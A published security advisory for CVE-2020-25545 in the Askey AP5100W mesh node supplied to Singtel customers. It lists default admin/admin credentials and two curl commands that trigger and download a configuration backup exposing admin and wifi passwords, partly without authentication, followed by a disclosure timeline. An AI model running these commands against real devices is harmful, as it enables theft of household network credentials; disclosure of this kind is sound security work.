Advisories

Askey AP5100W Information Leak through Insecure backups

CVE ID

CVE-2020-25545

Tested Versions

  • Askey AP5100W version Dual_SIG_1.01.071

Product URL(s)

  • https://www.askey.com.tw/

Askey AP5100W was a wifi mesh node provided to Singtel customers as part of their Fibre Broadband contract package. It is used to provide greater WiFi coverage in homes or offices.

The wifi mesh node comes with a configurable web interface that allows users to modify settings on their mesh nodes and run diagnostics.

Vulnerability

The default login credential of the web interface for the Askey AP5100W is as follows:

  • Login Name: admin
  • Password: admin

Upon successful authentication, an attacker can send the following command to create a configuration backup using the following command

curl 'http://IP_ADDR_OF_WEB_INTERFACE/status.cgi?_=1590135633550&service=cfgbackup&act=nvset' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'X-Requested-With: XMLHttpRequest' -H 'DNT: 1' -H 'Connection: keep-alive'

If successful, the response is as follows:

{"nvset":"ok"}

Then the attacker would be able to obtain the configuration file (contains admin login password, wifi password and etc) through

curl http://IP_ADDR_OF_WEB_INTERFACE/configs/config.tar

In the worst case scenario, regardless of the login status. Meaning if an admin has backed up the configuration file, the attacker is still able to obtain the admin login password even without authentication.

Vendor Response

The vendor didn’t replied to us despite all the efforts we made.

Timeline

  • 2020-05-22 Reported to Askey, no reply from Askey
  • 2020-05-28 Reported to Askey again, no reply from Askey
  • 2020-06-03 Reported to CSA, CSA replied on same day saying that they will inform Askey and SingTel
  • 2020-06-09 Email to CSA again, CSA replied that SingTel and Askey didn't get back to them.
  • 2020-06-09 Reported to Mitre, but no reply
  • 2020-07-14 Reported to Mitre again, but no reply again.
  • 2020-09-15 Mitre finally replied with CVE

Credit

Discovered by Li Bailin